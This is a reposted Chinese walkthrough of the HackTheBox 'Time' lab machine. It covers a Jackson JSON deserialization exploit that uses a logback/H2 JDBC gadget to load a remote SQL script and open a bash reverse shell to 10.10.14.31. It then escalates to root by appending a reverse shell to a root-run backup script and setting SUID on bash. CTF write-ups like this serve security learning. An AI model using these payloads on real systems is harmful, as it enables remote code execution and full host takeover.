当前位置：首页 > news >正文

HTB-Time

news 文章来源：https://blog.csdn.net/qq_37370714/article/details/130301951 2025/5/6 19:20:59

HTB-Time

信息收集
- 80端口
立足
pericles -> root

请添加图片描述

信息收集

在这里插入图片描述

80端口

在这里插入图片描述
有两个功能，一个是美化JSON数据。

在这里插入图片描述

一个是验证JSON，并且输入{“abc”:“abc”}之类的会出现报错。
在这里插入图片描述

Validation failed: Unhandled Java exception:
com.fasterxml.jackson.core.JsonParseException: Unexpected character
(‘’’ (code 39)): expected a valid value (number, String, array,
object, ‘true’, ‘false’ or ‘null’)

根据报错可知是java jackson的报错。有关java jackson的漏洞非常多。其中有一篇文章提到几个负载。

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.31:4443/~test"}]

在这里插入图片描述

立足

新建一个文件名为inject1.sql。

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.31/443 0>&1')

python开启http.server。然后在验证功能下输入：

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.31:8000/inject1.sql'"}]

在这里插入图片描述

pericles -> root

pspy64可以看到有一个timer_backup.sh没几秒种就会运行一次。
在这里插入图片描述
内容如下：

#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

以及/usr/bin/systemctl restart web_backup.service。
在这里插入图片描述
查找web_backup.service并查看内容：

find / -name web_backup.service -type f 2>/dev/null
/etc/systemd/system/web_backup.servicepericles@time:/tmp$ cat /etc/systemd/system/web_backup.service
[Unit]
Description=Creates backups of the website[Service]
ExecStart=/bin/bash /usr/bin/timer_backup.sh

因为隔几秒种会重启web_backup.service，web_backup.service服务又会运行/usr/bin/timer_backup.sh。

还有一个/bin/sh -c /usr/bin/systemctl restart timer_backup.timer，不过我暂时不需要，留在这备用。
在这里插入图片描述
我们能写入timer_backup.sh但是时间任务并没执行我写入的内容，可能还有时间任务先对timer_backup.sh进行重置再运行。顺序是某个东西启动web_backup.service，web_backup.service启动timer_backup.sh。但是我没找到那个东西是什么。所以我决定再尝试对timer_backup.sh追加写入试试。向末尾添加cp /bin/bash /tmp/bash;chmod u+s /tmp/bash后等待片刻后仍无任何成功迹象。写入reshell到/usr/bin/timer_backup.sh里能成功。

 echo -e '\nbash -i >& /dev/tcp/10.10.14.31/4443 0>&1' >> /usr/bin/timer_backup.sh

但是几秒钟后就没了。
在这里插入图片描述
可以用echo “chmod u+s /bin/bash” 修改/bin/bash，但为什么不能复制过来后再修改呢。

我不知道。

HTB-Time

HTB-Time

信息收集

80端口

立足

pericles -> root

相关文章：

HTB-Time

零基础C/C++开发到底要学什么？

OpenStack中的CPU与内存超分详解

main.m文件解析--@autoreleasepool和UIApplicationMain

C语言复习之顺序表（十五）

学系统集成项目管理工程师（中项）系列10_立项管理

电视盒子哪个好？数码小编盘点2023电视盒子排行榜

flink动态表的概念详解

ArcGIS Pro用户界面

HDCTF 2023 Pwn WriteUp

【 Spring 事务】

【刷题之路】LeetCode 203. 移除链表元素

关于Open Shift(OKD) 中用户认证、权限管理、SCC 管理的一些笔记

活动文章测试（勿删）

Windows下批量重命名文件【bat实现】

从 Milvus 2.2 到 2.2.6，我们是如何持续稳定升级的

自学python有推荐的么

设计模式 --- 行为型模式

防御式编程

导出pdf Puppeteer 和 wkhtmltopdf区别

sequelize + Nodejs + MySQL 的简单用法

Android Jetpack - Navigation 组件：进行应用程序导航

MySQL的binlog原理和它的几种使用方法

40岁以上的程序员还容易找到工作吗？聊聊我自己的亲身经历

Class类

Python小姿势 - 可选知识点：

Javaee Spring的AOP简介

基于ansible初始化linux服务器基础环境。

leetcode-数据库题

[元来学NVMe协议] NVMe IO 指令集（NVM 指令集）| Flush 命令